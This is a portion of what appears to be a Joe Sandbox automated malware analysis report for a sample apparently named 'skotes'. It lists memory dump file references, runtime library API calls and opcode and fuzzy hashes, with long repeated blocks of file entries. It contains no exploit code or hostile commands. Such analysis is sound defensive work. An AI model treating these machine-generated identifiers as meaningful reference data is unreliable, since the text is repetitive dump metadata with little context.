                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___scrt_fastfail
                                                                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                            • API String ID: 2964418898-3242537097
                                                                                                                                                                                            • Opcode ID: eb4c57ff3d690fea3509e2aed67899b6b8c30190a0b4f67d55ba3de567bde962
                                                                                                                                                                                            • Instruction ID: 5874eb9b0f9fa87e508e226a40d26b70c54112c16b82a38b4c5189984910b406
                                                                                                                                                                                            • Opcode Fuzzy Hash: eb4c57ff3d690fea3509e2aed67899b6b8c30190a0b4f67d55ba3de567bde962
                                                                                                                                                                                            • Instruction Fuzzy Hash: 13018661B82B1169DB353B755C0EEEB258B8B4BB42F0A2514AC01E7291EFA0CC815561
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 0062E91E
                                                                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0062E926
                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0062E950
                                                                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0062E959
                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0062E9DC
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 512098550-0
                                                                                                                                                                                            • Opcode ID: 2c63a34fa342e63dd323950b987e078d5a54dfcf23addac583e07115b2affb7c
                                                                                                                                                                                            • Instruction ID: fbdc2b78fbb30738f1349811073279e46126714128604e6c8f69f942579f3672
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c63a34fa342e63dd323950b987e078d5a54dfcf23addac583e07115b2affb7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3416F35A00629EFCB09DF64D554AADB7B6FF48310F04816AE806AB790CB75EE41CF80
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0062D344
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062D367
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0062D370
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062D3A8
                                                                                                                                                                                            • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0062D3B3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4212520697-0
                                                                                                                                                                                            • Opcode ID: d5670347acab09782f2f43caf6dbeb46e5c35279b1bb1219be1a7803bf279572
                                                                                                                                                                                            • Instruction ID: c3c40d2031716edb0b9ef29e37fdc9b60ebff53bbc54309c767bc4407f1d6244
                                                                                                                                                                                            • Opcode Fuzzy Hash: d5670347acab09782f2f43caf6dbeb46e5c35279b1bb1219be1a7803bf279572
                                                                                                                                                                                            • Instruction Fuzzy Hash: B831AC35700A20AFCB05DB64E884BADB7A7BF89310F140099E8069B392DB74ED41CF92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _SpinWait.LIBCONCRT ref: 006286EE
                                                                                                                                                                                              • Part of subcall function 0061EAD0: _SpinWait.LIBCONCRT ref: 0061EAE8
                                                                                                                                                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00628702
                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00628734
                                                                                                                                                                                            • List.LIBCMT ref: 006287B7
                                                                                                                                                                                            • List.LIBCMT ref: 006287C6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
